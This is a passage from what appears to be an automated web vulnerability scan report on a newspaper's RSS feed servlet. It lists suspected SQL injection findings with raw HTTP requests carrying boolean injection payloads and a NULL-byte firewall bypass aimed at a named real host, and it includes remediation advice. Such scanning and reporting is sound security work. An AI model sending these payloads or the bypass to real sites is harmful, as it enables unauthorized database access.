User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:19:09 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

1.22. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200743.xml [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200743.xml

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /mngi/rss/CustomRssServlet%00'/568/200743.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 400 Bad Request
Content-Type: text/html
Content-Length: 34
Date: Tue, 07 Dec 2010 23:19:01 GMT
Connection: close

<h1>Bad Request (Invalid URL)</h1>

Request 2

GET /mngi/rss/CustomRssServlet%00''/568/200743.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:19:02 GMT
Content-Length: 0
Connection: close


1.23. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200744.xml [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200744.xml

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads 62668673%20or%201%3d1--%20 and 62668673%20or%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi/rss/CustomRssServlet/56862668673%20or%201%3d1--%20/200744.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:19:07 GMT
Content-Length: 0
Connection: close

Request 2

GET /mngi/rss/CustomRssServlet/56862668673%20or%201%3d2--%20/200744.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:19:07 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

1.24. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200746.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200746.xml

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi'%20and%201%3d1--%20/rss/CustomRssServlet/568/200746.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:18:56 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

Request 2

GET /mngi'%20and%201%3d2--%20/rss/CustomRssServlet/568/200746.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Pragma: no-cache
Content-Type: text/html
Cache-Control: no-cache
Expires: Tue, 07 Dec 2010 23:18:57 GMT
Date: Tue, 07 Dec 2010 23:18:57 GMT
Content-Length: 424
Connection: close

<HTML>
<!-- This file is for Error code #404 - Not Found -->
<HEAD>
<TITLE>Not Found (404)</TITLE>
</HEAD>

<BODY BGCOLOR="#eeeeff">
<H1>Not Found (404)</H1>

The file that you requested could not be found on this server. If you provided the URL, please check to ensure that it is correct. If you followed a hypermedia link, please notify the administrator of that server of this error.
</BODY></HTML>


1.25. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200746.xml [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200746.xml

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads 23993338%20or%201%3d1--%20 and 23993338%20or%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi/rss/CustomRssServlet/56823993338%20or%201%3d1--%20/200746.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:19:03 GMT
Content-Length: 0
Connection: close

Request 2

GET /mngi/rss/CustomRssServlet/56823993338%20or%201%3d2--%20/200746.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:19:03 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

1.26. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200747.xml [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200747.xml

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads 18638958%20or%201%3d1--%20 and 18638958%20or%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi/rss/CustomRssServlet/56818638958%20or%201%3d1--%20/200747.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:19:09 GMT
Content-Length: 0
Connection: close

Request 2

GET /mngi/rss/CustomRssServlet/56818638958%20or%201%3d2--%20/200747.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:19:09 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

1.27. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200747.xml [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200747.xml

Issue detail

The REST URL parameter 5 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 5, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /mngi/rss/CustomRssServlet/568/200747.xml%00' HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 400 Bad Request
Content-Type: text/html
Content-Length: 34
Expires: Tue, 07 Dec 2010 23:19:12 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 07 Dec 2010 23:19:12 GMT
Connection: close

<h1>Bad Request (Invalid URL)</h1>

Request 2

GET /mngi/rss/CustomRssServlet/568/200747.xml%00'' HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/xml;charset=utf-8
Expires: Tue, 07 Dec 2010 23:19:12 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 07 Dec 2010 23:19:12 GMT
Content-Length: 12372
Connection: close
Set-Cookie: JSESSIONID=EDZ5AFGTMHV4ACUUBC5CFGQ; path=/

<?xml version="1.0" encoding="UTF-8"?>
<rss xmlns:dc="http://purl.org/dc/elements/1.1/"
xmlns:atom="http://www.w3.org/2005/Atom"
version="2.0">
<channel>
<atom:link href="http://fee
...[SNIP]...

1.28. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200748.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200748.xml

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi'%20and%201%3d1--%20/rss/CustomRssServlet/568/200748.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:19:18 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

Request 2

GET /mngi'%20and%201%3d2--%20/rss/CustomRssServlet/568/200748.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Pragma: no-cache
Content-Type: text/html
Cache-Control: no-cache
Expires: Tue, 07 Dec 2010 23:19:19 GMT
Date: Tue, 07 Dec 2010 23:19:19 GMT
Content-Length: 424
Connection: close

<HTML>
<!-- This file is for Error code #404 - Not Found -->
<HEAD>
<TITLE>Not Found (404)</TITLE>
</HEAD>

<BODY BGCOLOR="#eeeeff">
<H1>Not Found (404)</H1>

The file that you requested could not be found on this server. If you provided the URL, please check to ensure that it is correct. If you followed a hypermedia link, please notify the administrator of that server of this error.
</BODY></HTML>


1.29. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200748.xml [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200748.xml

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi/rss/CustomRssServlet/568%20and%201%3d1--%20/200748.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:19:29 GMT
Content-Length: 0
Connection: close

Request 2

GET /mngi/rss/CustomRssServlet/568%20and%201%3d2--%20/200748.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:19:29 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

1.30. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200748.xml [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200748.xml

Issue detail

The REST URL parameter 5 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 5, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /mngi/rss/CustomRssServlet/568/200748.xml%00' HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 400 Bad Request
Content-Type: text/html
Content-Length: 34
Expires: Tue, 07 Dec 2010 23:19:33 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 07 Dec 2010 23:19:33 GMT
Connection: close

<h1>Bad Request (Invalid URL)</h1>

Request 2

GET /mngi/rss/CustomRssServlet/568/200748.xml%00'' HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/xml;charset=utf-8
Expires: Tue, 07 Dec 2010 23:19:34 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 07 Dec 2010 23:19:34 GMT
Content-Length: 22692
Connection: close
Set-Cookie: JSESSIONID=GL5CPID3GOAV2CUUBC5CFGQ; path=/

<?xml version="1.0" encoding="UTF-8"?>
<rss xmlns:dc="http://purl.org/dc/elements/1.1/"
xmlns:atom="http://www.w3.org/2005/Atom"
version="2.0">
<channel>
<atom:link href="http://fee
...[SNIP]...

1.31. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200749.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200749.xml

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi'%20and%201%3d1--%20/rss/CustomRssServlet/568/200749.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:19:12 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
